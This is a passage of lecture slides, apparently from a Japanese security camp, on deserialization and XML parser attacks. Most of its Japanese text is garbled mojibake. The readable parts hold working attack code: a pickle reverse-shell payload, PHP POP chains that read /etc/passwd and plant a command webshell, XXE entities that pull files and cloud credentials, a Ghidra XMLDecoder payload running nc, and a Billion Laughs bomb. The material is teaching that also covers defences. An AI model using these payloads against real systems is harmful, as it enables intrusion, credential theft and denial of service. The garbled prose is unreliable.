  52.  બߟ՝୊&ղઆ w λʔήοτͷ୺຤͔Β߈ܸऀ͕଴ͪड͚͍ͯΔ୺຤΁ͱ઀ଓ͠ʹ͍͘͜ͱ Ͱɺ߈ܸऀ͕λʔήοτͷ୺຤্Ͱಈ࡞͢ΔγΣϧΛૢ࡞Ͱ͖ΔΑ͏ʹ͢Δ ςΫχοΫΛϦόʔεγΣϧͱݺͿ ϦόʔεγΣϧͱ͸ ԿΒ͔ͷํ๏ͰϦόʔεγΣϧΛߦ͏ίʔυΛ࣮ߦͤ͞Δ ߈ܸऀ͕଴ͪड͚Δ୺຤ʹ઀ଓ ೚ҙίʔυΛ࣮ߦ

  53.  બߟ՝୊&ղઆ w αʔό্Ͱ೚ҙίʔυ࣮ߦʹ੒ޭͨ͠ͱͯ͠΋݁Ռ͕Ϩεϙϯε΍6*্ʹग़ͯ ͘Δͱ͸ݶΒͳ͍ɻ w ϦόʔεγΣϧʹΑͬͯ೚ҙίʔυ࣮ߦͷ݁ՌΛ֬ೝͰ͖Δ ϦόʔεγΣϧͷ༻్ ೚ҙίʔυ࣮ߦͰ͖Δ͔΋͠Εͳ͍ίʔυ

  54.  બߟ՝୊&ղઆ w ୈҰҾ਺ʹࢦఆ͞Εͨ#BTFจࣈྻΛσίʔυ্ͨ͠ͰVOQJDLMFԽ͍ͯ͠Δ w QJDLMFԽ্ͨ͠Ͱ#BTFʹΤϯίʔυͨ͠จࣈྻΛࢦఆ͢Δ͜ͱͰ VOQJDLMF࣌ʹੜ੒͞ΕΔΦϒδΣΫτΛ੍ޚͰ͖Δ w ϚδοΫϝιουΛ࢖ͬͯϦόʔεγΣϧΛੜ੒͢ΔίʔυΛ࣮ߦ͢Ε͹ ղ͚Δ

    ํ਑

  55. બߟ՝୊&ղઆ  #!/usr/bin/env python3 # coding: UTF-8 import pickle import

    socket import os import base64 class GetReverseShell(object): def __reduce__(self): return (os.system, ('/bin/sh </dev/tcp/localhost/1234 >&0 2>&0',)) payload = pickle.dumps(GetReverseShell()) print(base64.urlsafe_b64encode(payload)) ϖΠϩʔυੜ੒

  56. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ରࡦ w ۃྗγϦΞϥΠζσγϦΞϥΠζΛߦΘͳ͍Α͏ʹ͢Δ w ୅ΘΓʹ+40/΍:".-ͳͲͷϑΥʔϚοτΛར༻͢Δ w γϦΞϥΠζσγϦΞϥΠζΛߦ͏ඞཁ͕͋Δ৔߹͸ɺσδλϧॺ໊Λ෇༩ ͠ɺվ͟ΜͰ͖ͳ͍Α͏ʹ͢Δ 

  57. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ߈ܸํ๏ʢ1)1ͷ৔߹ʣ w 1)1Ͱ͸TFSJBMJ[F Λ࢖ͬͯΦϒδΣΫτΛγϦΞϥΠζՄೳ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ࣍͠ͷ͕̎ͭ༗໊ w @@XBLFVQ ϝιου

    w @@EFTUSVDU ϝιου w γϦΞϥΠζ͞ΕͨจࣈྻΛVOTFSJBMJ[F ʹ౉͢͜ͱͰΦϒδΣΫτΛૠೖ ͢Δ߈ܸख๏੬ऑੑΛ1)10CKFDU*OKFDUJPOͱ͍͏ 

  58. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH 1)1ಛ༗ͷςΫχοΫ w ϚδοΫϝιουΛ࣋ͭΫϥεΛ௨ͯ͡௚઀͸࣮ߦͰ͖ͳ͍ϝιουΛ ࣮ߦ͢Δ߈ܸख๏ w ΦϒδΣΫτͷϓϩύςΟʢΫϥεͷϝϯόม਺ʣΛ੍ޚ͠ɺ ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ w λʔήοτ಺෦ͷίʔυΛ࠶ར༻͢Δ$PEF3FVTF"UUBDLͷҰछ

    w ଞʹ͸301ɺ3FUVSOJOUPMJCD͕͋Δ 

  59. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH Πϝʔδਤ  Ϋϥε Ϋϥε Ϋϥε Ϋϥε ΨδΣοτ ΨδΣοτ ΨδΣοτ

    ΨδΣοτ w ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ

  60. 1)1ಛ༗ͷςΫχοΫ  class Example { private $obj; function __construct() {

    // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB w 1045ύϥϝʔλEBUB͸ VOTFSJBMJ[F ͞ΕΔ w ϚδοΫϝιου͸ &YBNQMFΫϥεʹ͋Δ w @@XBLFVQϝιουͰ͸ ม਺PCKͷFWBMVBUF Λ ࣮ߦ͢Δ w FWBM Λݺͼग़͢ $PEF4OJQQFUΫϥεͷ FWBMVBUF Λ࣮ߦ͍ͨ͠ʜ ࣮ߦ͍ͨ͠ʂʂʂ

  61. 1)1ಛ༗ͷςΫχοΫ w &YBNQMFΫϥεͷม਺PCK ʹ$PEF4OJQQFUΫϥεΛ ࢦఆ w $PEF4OJQQFUΫϥεͷ ม਺DPEFʹ࣮ߦͨ͠ ίʔυΛࢦఆ w

    ͜ͷΑ͏ͳಈ࡞Λ͢Δ γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛࢦఆͰ͖Ε ͹0,  class Example { private $obj; function __construct() { // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $PEF4OJQQFUΫϥεʹॻ͖׵͑Δ ࣮ߦ͍ͨ͠ίʔυΛ ೖྗ

  62. 1)1ಛ༗ͷςΫχοΫ w γϦΞϥΠζ͞ΕͨΦϒδ ΣΫτΛੜ੒͢Δ1)1ίʔ υΛॻ͖ɺ࣮ߦ͢Δͱ ߈ܸίʔυ͕ಘΒΕΔ  <?php class CodeSnippet

    { private $code = "phpinfo();"; } class Example { private $obj; function __construct() { $this->obj = new CodeSnippet; } } echo serialize(new Example); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $ php pop-poc.php O:7:"Example":1:{s:12:"Exampleobj";O:11:"CodeSnippet":1: {s:17:"CodeSnippetcode";s:10:"phpinfo();";}}

  63. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ w ࣮ࡍʹ1SPQFSUZ0SJFOUFE1SPHSBNNJOHΛ΍Δʹ͸γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛฤूͨ͘͠ͳΔ͜ͱ΋͋Δ w গ͚ͩ͠ฤू͍ͨ͠৔߹ɺίʔυ͔Βੜ੒͍ͯͯ͠͸໘౗ʜ w ਓྗͰಡΊΔΑ͏ʹͳ͓ͬͯ͘ͱϦΫΤετத͔ΒγϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛγϡοͱݟ͚ͭΒΕͯศརͳ͜ͱ΋͋Δ͔΋ʜ

    

  64. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH  γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ <?php class Seccamp { private $year =

    0; public function set_year($year){ $this->year = $year; } public function get_year(){ return $this->year; } } $object = new Seccamp(); $object->set_year(2021); echo serialize($object); w ࠨʹࣔ͢4FDDBNQΫϥεΛ ୊ࡐʹղઆ͍ͯ͘͠ w ϝϯόม਺ZFBSΛ࣋ͭ w TFU@ZFBSͱHFU@ZFBSͷͭ ͷϝιου͕͋Δ w TFU@ZFBSΛݺͼग़͠੔਺ Ληοτ͍ͯ͠Δ $ serialize-poc.php O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;}

  65. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH  γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;} 0CKFDUΛࣔ͢0 จࣈ਺ Ϋϥε໊ ϓϩύςΟͷ਺ 4USJOHΛࣔ͢T จࣈ਺

    จࣈྻ *OUFHFSΛࣔ͢J ਺஋

  66. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζϑΥʔϚοτৄઆ w CPPMFBO w CWBMVF w JOUFHFS w JWBMVF

    w EPVCMF w EWBMVF  IUUQTJOTPNOJBTFDDPNEPXOMPBETQVCMJDBUJPOT1SBDUJDBM1)10CKFDU*OKFDUJPOQEG w /6-- w / w TUSJOH w TMFOHUIWBMVF w BSSBZ w BMFOHUI\LFZ WBMVFQBJST^

  67. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH 301ʹࣅ͍ͯΔ w ίʔυͷஅยΛগ࣮ͣͭ͠ߦ͍͖ͯ͠ɺ࠷ऴతʹ໨ඪΛୡ੒͢Δͱ͜Ζ͕ 301ʹࣅ͍ͯΔ w όΠφϦʹର͢ΔFYQMPJUςΫχοΫͷߟ͑ํ͕8FCͷੈքʹԠ༻͞Ε͍ͯΔ Α͏Ͱɺ͓΋͠Ζ͍ʂʂ 

  68. ԋश0CKFDU*OKFDUJPOʢ෼ʣ w ࣍ͷίϚϯυΛೖྗ͢Δͱ%PDLFSίϯςφ্ཱ͕͕ͪΓ·͢  $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd

    seccamp2021-b5 $ cd exercise/object-injection/ $ docker-compose build $ docker-compose up

  69. w IUUQMPDBMIPTUΛϒϥ΢βͰ։͘͜ͱͰԋश؀ڥʹ ΞΫηεͰ͖·͢ ԋश0CKFDU*OKFDUJPOʢ෼ʣ 

  70. ԋशղઆ0CKFDU*OKFDUJPO w ߨ࣮ٛࢪ࣌ʹ͸Ξοϓϩʔυ͍ͯ͠ͳ͔ͬͨ-FWFMɺ-FWFMΛ ղͨ͘ΊͷεΫϦϓτ͸(JU)VCϦϙδτϦʹ্͛ͯ͋Γ·͢ʂ w IUUQTHJUIVCDPNULNSVTFDDBNQCUSFFNBTUFSFYFSDJTF PCKFDUJOKFDUJPOTPMWFS 

  71. ԋशղઆ-FWFM 

  72. ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛ @@XBLFVQϝιουͰಡΈऔ͍ͬͯΔ w PCKFDUύϥϝʔλͰγϦΞϥΠζ͞ΕͨΦϒδΣΫτΛड͚औΓ VOTFSJBMJ[F͍ͯ͠Δ w QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUFJOHΫϥεΛγϦΞϥΠζͨ͠΋ͷ ΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUDQBTTXE͕ಡΈऔΕͦ͏ʂʂ

     ํ਑

  73. ԋशղઆ-FWFM 

  74. ԋशղઆ-FWFM 

  75. ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛSFBEϝιουͰ ಡΈऔ͍ͬͯΔ w ͨͩ͠ɺ-FWFMͱҧͬͯ4FUUJOHΫϥε಺Ͱ͸ϚδοΫϝιου͕ͳ͍ʜ w .BJOΫϥεͰ͸ϚδοΫϝιου಺Ͱϝϯόม਺pMFͷSFBEϝιουΛ࣮ߦ͢Δ ͕pMFʹ͸OVMM͕ࢦఆ͞Ε͍ͯΔʜ w

    QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUJOHΫϥεΛ.BJOΫϥεͷϝϯόม਺ pMFʹࢦఆ͠ɺγϦΞϥΠζͨ͠΋ͷΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUD QBTTXE͕ಡΈऔΕͦ͏ʂʂ  ํ਑

  76. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { $content = file_get_contents($this->path); echo $content; } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = "/etc/passwd"; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

  77. ԋशղઆ-FWFM 

  78. ԋशղઆ-FWFM 

  79. ԋशղઆ-FWFM w େମ-FWFMͱಉ͕ͩ͡ɺ4FUUJOHΫϥε಺Ͱ͸TZTUFNؔ਺Λ࢖͍ͬͯΔ w ೚ҙίʔυ࣮ߦͷνϟϯεʂʂʂ w DBUΛ࣮ߦͨ͠ޙʹͰίϚϯυΛ۠੾ͬͯFDIPίϚϯυͰXFCTIFMMͱͯ͠ ಈ࡞͢ΔQIQϑΝΠϧΛॻ͖ࠐΈͰ͖Δ w DBUDPOpHKTPOFDIPa

    QIQTZTUFN @(&5<DNE>  aBQIQ w 1BUIʹˢ͕࣮ߦ͞ΕΔΑ͏ͳจࣈྻΛࢦఆ͢ΔͱΑͦ͞͏ʂʂʂ  ํ਑

  80. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { system("cat " . $this->path); } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = 'config.json; echo \'<?php system($_GET["cmd"]);?>\' > a.php'; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

  81. ԋशղઆ-FWFM 

  82. ԋशղઆ-FWFM 

  83. ͜͜·Ͱͷ·ͱΊ w ༷ʑͳϓϩάϥϛϯάݴޠʹσγϦΞϥΠζγϦΞϥΠζͷ࢓૊Έ͕࣮૷͞ Ε͍ͯΔ w Ϣʔβ͕ࣗ༝ʹγϦΞϥΠζ͞ΕͨσʔλΛࢦఆͰ͖Δঢ়گ͸ةݥ w ϚδοΫϝιουΛ༻͍Ε͹༰қʹ3$&ʹ·Ͱ࣋ͪࠐΊΔ 

  84. ٳܜʢ෼ʣ

  85. ୈ̏ষɿ 9.-ύʔαΛૂͬͨ߈ܸ

  86. 9.-ͷ༻్ 9.-ͱ͸ w 9.-ʢF9UFOTJCF.BSLVQ-BOHVBHFʣ͸ϚʔΫΞοϓݴޠͷͻͱͭ w ϚʔΫΞοϓݴޠςΩετϑΝΠϧͷதʹɺςΩετͱಛఆͷه߸Λ ૊Έ߹Θͤɺ෇Ճ৘ใΛهड़ͨ͠΋ͷɻ)5.-ͳͲ w ֤छઃఆϑΝΠϧͷϑΥʔϚοτʹͳ͍ͬͯΔ͜ͱ͕ଟ͍ w

    "OESPJE.BOJGFTUYNMͳͲ 

  87. 9.-ͷߏ଄ 9.-ͷྫ w λάͷೖΕࢠߏ଄Ͱσʔλ͕දݱ͞ΕΔ  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT

    lectures (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> MFDUVSFTλάͷ಺༰Λఆٛ MFDUVSFTλάΛ࢖ͬͯ಺༰Λهࡌ

  88. 9.-ͷߏ଄ w ཁૉΛఆ͍ٛͯ͠ΔՕॴΛ%5%ʢ%PDVNFOU5ZQF%FpOJUJPOʣͱ͍͏  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT lectures

    (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> 9.-ͷྫ MFDUVSFTλάΛ ఆٛ͢Δ%5%

  89. 9.-ͷߏ଄ w ྫʹ্͛ͨ9.-Ͱ͸MFDUVSFTλάͷߏ੒ཁૉɺଐੑΛఆ͍ٛͯͨ͠   w &OUJUZͱݺ͹ΕΔ໊લ෇͖ఆ਺ͷఆٛ΋Ͱ͖Δ  %5%ʹΑͬͯఆٛ͞ΕΔ΋ͷ <?xml

    version="1.0"?> <!DOCTYPE lectures[]> <?xml version="1.0"?> <!ENTITY title "झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ">

  90. 9.-ͷߏ଄ w ఆ਺Λද͢&OUJUZʹ͸*OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZͷ̎छྨ͕͋Δ w 4:45&.ΩʔϫʔυΛ༻͍ͯ63*εΩʔϜ͔Β஋ΛऔಘͰ͖Δ w 8FCϖʔδͷ63-΍ϩʔΧϧͷϑΝΠϧύεΛࢦఆͯ͠ ֎෦͔Β஋Λऔಘ͢Δͷ͕&YUFSOBM&OUJUZ  *OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZ

    <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY xml-file SYSTEM "http://example.com/sample.xml"> <!ENTITY txt-file SYSTEM “file:///path/to/file.txt“> ]> <demo> <file>&xml-file</file> <file>&txt-file</file> </demo>

  91. 9.-FYUFSOBMFOUJUZJOKFDUJPO ֓ཁ w Ϣʔβ͕ࢦఆͨ͠9.-ϑΝΠϧΛॲཧ͢ΔΞϓϦέʔγϣϯ͕͋Δͱ͢Δ w &YUFSOBM&OUJUZΛ༻͍ͯϩʔΧϧͷϑΝΠϧɺ಺෦ωοτϫʔΫͷΞυϨε Λࢦఆͨ͠9.-ϑΝΠϧΛΞϓϦέʔγϣϯʹॲཧͤ͞Δ͜ͱͰ ຊདྷ͸Ϣʔβ͕஌Γಘͳ͍৘ใΛऔಘͰ͖Δ w ͜ͷ߈ܸख๏͸9.-&YUFSOBM&OUJUZʢ99&ʣJOKFDUJPOͱݺ͹ΕΔ

     <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY txt-file SYSTEM “file:///etc/passwd“> <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]>

  92. 9.-FYUFSOBMFOUJUZJOKFDUJPO 443'΁ͭͳ͛Δ w ݱ୅ͷ8FCΞϓϦέʔγϣϯ͸αʔό̍ͭͰಈ͍͍ͯΔ͜ͱ͸গͳ͘ɺ༷ʑ ͳαʔό͕૊Έ߹Θͬͯ͞ಈ͍͍ͯΔ w ຊདྷϢʔβ͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦৘ใʹΞΫηε͢Δ߈ܸ͕443' w ֎෦͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦ωοτϫʔΫ্ʹଘࡏ͍ͯ͠Δαʔό͕ ର৅ʹͳΔ

    

  93. 9.-FYUFSOBMFOUJUZJOKFDUJPO &$ͷNFUBEBUBͷऔಘ w "84&$Ͱ͸಺෦ΞυϨεʹΫϨσϯγϟϧΛอ͍࣋ͯ͠Δ w IUUQTMBUFTUNFUBEBUBJBNTFDVSJUZDSFEFOUJBMT w গ͠લ·Ͱɺ&YUFSOBM&OUJUZΛ্͔ͭͬͯهΞυϨεʹΞΫηε͢Δͱ FYUFSOBMFOUJUZJOKFDUJPO͔Β443'ʹൃలͤ͞ΒΕͨ 

    <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]> <demo> &aws-metadata </demo>

  94. 9.-FYUFSOBMFOUJUZJOKFDUJPO *.%4WʹΑΔ&$ͷ؇࿨ࡦ w ݱ୅Ͱ΋&$্ͰʹΫϨσϯγϟϧ͸ଘࡏ͢Δ͕ ؆୯ʹ͸ΞΫηεͰ͖ͳ͍ w ࣄલʹ165ϦΫΤετͰऔಘͨ͠τʔΫϯ͕ඞਢʹͳͬͨ w 9.-ͷFOUJUZ͔Β͸165ϦΫΤετ͸ඈ͹ͤͳ͍ͨΊɺ FYUFSOBMFOUJUZJOKFDUJPO͔ΒΫϨσϯγϟϧΛऔಘ͢Δ͜ͱ͸Ͱ͖ͳ͍

    w (PQIFSϓϩτίϧΛ࢖͑͹*.%4W͕༗ޮͰ΋ΫϨσϯγϟϧΛऔಘՄೳ͕ͩ 9.-ύʔαͱؔ܎ͳ͍࿩ʹͳͬͯ͠·͏ͷͰ͜͜Ͱ͸ׂѪ 

  95. 9.-FYUFSOBMFOUJUZJOKFDUJPO ରࡦ w 9.-ϑΝΠϧ͸ػೳ͕๛෋Ͱѻ͍͕Ή͔͍ͣ͠ͷͰ+40/ϑΝΠϧͳͲͷ ଞͷϑΝΠϧϑΥʔϚοτΛࢦఆ͢Δ w 9.-ύʔα͕%5%Λॲཧ͠ͳ͍Α͏ʹػೳΛ੍ݶ͢Δ 

  96. (IJESBͰͷྫ ࣄલ՝୊̍ w (IJESBʹ͸99&ͷ੬ऑੑ͕ͭ͋Δʢ೥݄࣌఺ʣ w $7& w $7& w ࠶ݱ؀ڥΛ࡞੒ͯ͠ɺ࣮ࡍʹ੬ऑੑΛ߈ܸͯ͠΋Β͏՝୊Λग़͍ͯ͠·ͨ͠

    

  97. $7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w ϓϩδΣΫτ৘ใΛอଘ͍ͯ͠ΔϓϩδΣΫτϑΝΠϧʢ HQSʣͷ಺෦ʹ 9.-ϑΝΠϧʢQSPKFDUQSQʣ͕ଘࡏ͢Δ w QSPKFDUQSQΛύʔε͢Δࡍʹ99&͕ՄೳͰ͋ͬͨ 

    ࣄલ՝୊ղઆ

  98. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding=“UTF-8”?> <!DOCTYPE aaa

    [ <!ENTITY % dtd SYSTEM “http://localhost:5000/xxe”> %dtd; ]> <FILE_INFO> <BASIC_INFO> <STATE NAME="OWNER" TYPE=“string” VALUE=“tkmru” /> </BASIC_INFO> </FILE_INFO>

  99. $7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w (IJESBʹ͸σϑΥϧτͰ͸༗ޮʹͳ͍ͬͯͳ͍ɺ࣮ݧతͳػೳ͕ଘࡏ͢Δ w 9.-ϑΝΠϧʹهࡌ͞ΕͨύλʔϯͰόΠφϦ಺Λݕࡧ͢Δ 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹ੬ऑੑ͕ଘࡏͨ͠  ࣄલ՝୊ղઆ

  100. $7& w $PEF#SPXTFSͷ'JMFϝχϡʔ͔Β$POpHVSFʜΛબ୒͢Δͱ $POpHVSF&YQFSJNFOUBM1MVHJOT΢Οϯυ΢͕։͔ΕΔ w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹνΣοΫΛ͍ΕΔͱର৅ػೳ͕ ༗ޮʹͳΔ  ࣄલ՝୊ղઆ

  101. $7& w 8JOEPX'VODUJPO#JU1BUUFSOT&YQMPSFSΑΓμΠΞϩάΛग़ͤΔ w 3FBE9.-'JMFTϘλϯΛΫϦοΫ͢Δ͜ͱͰ9.-ϑΝΠϧΛಡ·ͤΒΕΔ  ࣄલ՝୊ղઆ

  102. $7& w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹಡ·ͤΔ9.-ϑΝΠϧΛੜ੒͢Δ ඞཁ͕͋Δɻ w 4DSJQU.BOBHFS͔Β%VNQ'VODUJPO1BUUFSO*OGP4DSJQUΛ࣮ߦ͢Δͱ બ୒͍ͯ͠Δؔ਺ͷ๯಄ͷػցޠ΍ΞυϨεͳͲͷ৘ใΛهͨ͠9.-ϑΝΠ ϧ͕ग़ྗ͞ΕΔ w ग़ྗ͞Εͨ9.-Λฤूͯ͠ಡΈࠐΉ͜ͱͰ99&Λߦ͑Δ

     ࣄલ՝୊ղઆ

  103. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding="UTF-8"?> <java version="11.0.9"

    class="java.beans.XMLDecoder"> <object class="ghidra.bitpatterns.info.FileBitPatternInfo"> <void property="ghidraURL"> <string>TODO: url</string> </void> <void property="languageID"> <string>x86:LE:64:default</string> </void> ʢলུʣ <object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 5000</string> </void> </object> </java>

  104. ͜͜·Ͱ͸Α͘ղઆ͞Ε͍ͯΔ࿩ 9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏ w 99&͸̎ͭʹ෼ྨͰ͖Δ w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w 99&ͷଞʹ΋9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏͕͋Δ

    w #JMMJPOMBVHITʢ&YQPOFOUJBMFOUJUZFYQBOTJPOʣ w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w %FDPNQSFTTJPO#PNCͳͲ 

  105. 1ZUIPOΛ࢖ͬͯղઆ͠·͢ʂ w 1ZUIPOʹ͸9.-ύʔα͕ඪ४ϥΠϒϥϦͱͯ͠ଟ਺උΘ͍ͬͯΔ w ̍ͭͷݴޠͰෳ਺ͷ9.-ύʔαΛର৅ʹ؆୯ʹ1P$Λॻ͚ΔͨΊ ղઆʹ޲͍͍ͯΔ  ଞͷ9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏

  106. 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ 1ZUIPOެࣜαΠτهࡌͷඪ४ϥΠϒϥϦͨͪ  IUUQTEPDTQZUIPOPSHMJCSBSZYNMIUNMYNMWVMOFSBCJMJUJFT ͖ͬ͞ղઆͨ͠99&

  107. %FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ  1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

  108. %FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ w 1ZUIPOͷஶ໊ͳ9.-ϥΠϒϥϦͷϥούʔ w ηΩϡΞʹ9.-Λѻ͏ػೳΛ෇Ճͯ͘͠ΕΔ w JNQPSUจΛࠩ͠ସ͑Δ͚ͩͰηΩϡΞʹͳͬͯศར  1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

  109. 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ %FGVTFEYNMͷ3&"%.&ʹ͸΋ͬͱৄ͍͠ද͕هࡌ͞Ε͍ͯΔ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

  110. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  111. #JMMJPO-BVHIT 9.-ʹΑΔ%P4߈ܸ w ΤϯςΟςΟΛ܁Γฦ͠ࢀরͤ͞Δ͜ͱʹΑͬͯ$16΁ͷෛՙɺϝϞϦফඅ ྔΛ্͛Δ%P4߈ܸ w αʔό΁େྔͷΞΫηεΛߦ͍ಈ࡞Λෆ҆ఆʹͤ͞Δͷ͕%P4߈ܸͩͱ ޡղ͞Ε͕ͪ w ΞϓϦέʔγϣϯͷಈ࡞͕ෆՄೳʹͳΔΑ͏ͳɺ

    ҟৗʹಈ࡞ΛҾ͖ى͜͢ͷ͕%P4߈ܸͰ͋ͬͯखஈ͸ԿͰ΋ྑ͍ w 9.-CPNC΍FYQPOFOUJBMFOUJUZFYQBOTJPO߈ܸͱ΋ݺ͹ΕΔ 

  112. #JMMJPO-BVHIT 9.-ϑΝΠϧྫ w MPMʢMPUTPGMBVHITʣͱ͍͏ΠϯλʔωοτεϥϯάΛ༻͍ͨϑΝΠϧ͕༗໊ w ͦͷͨΊ#JMMJPO-BVHITͱ໊෇͚ΒΕ͍ͯΔ  <?xml version="1.0"?> <!DOCTYPE

    lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>

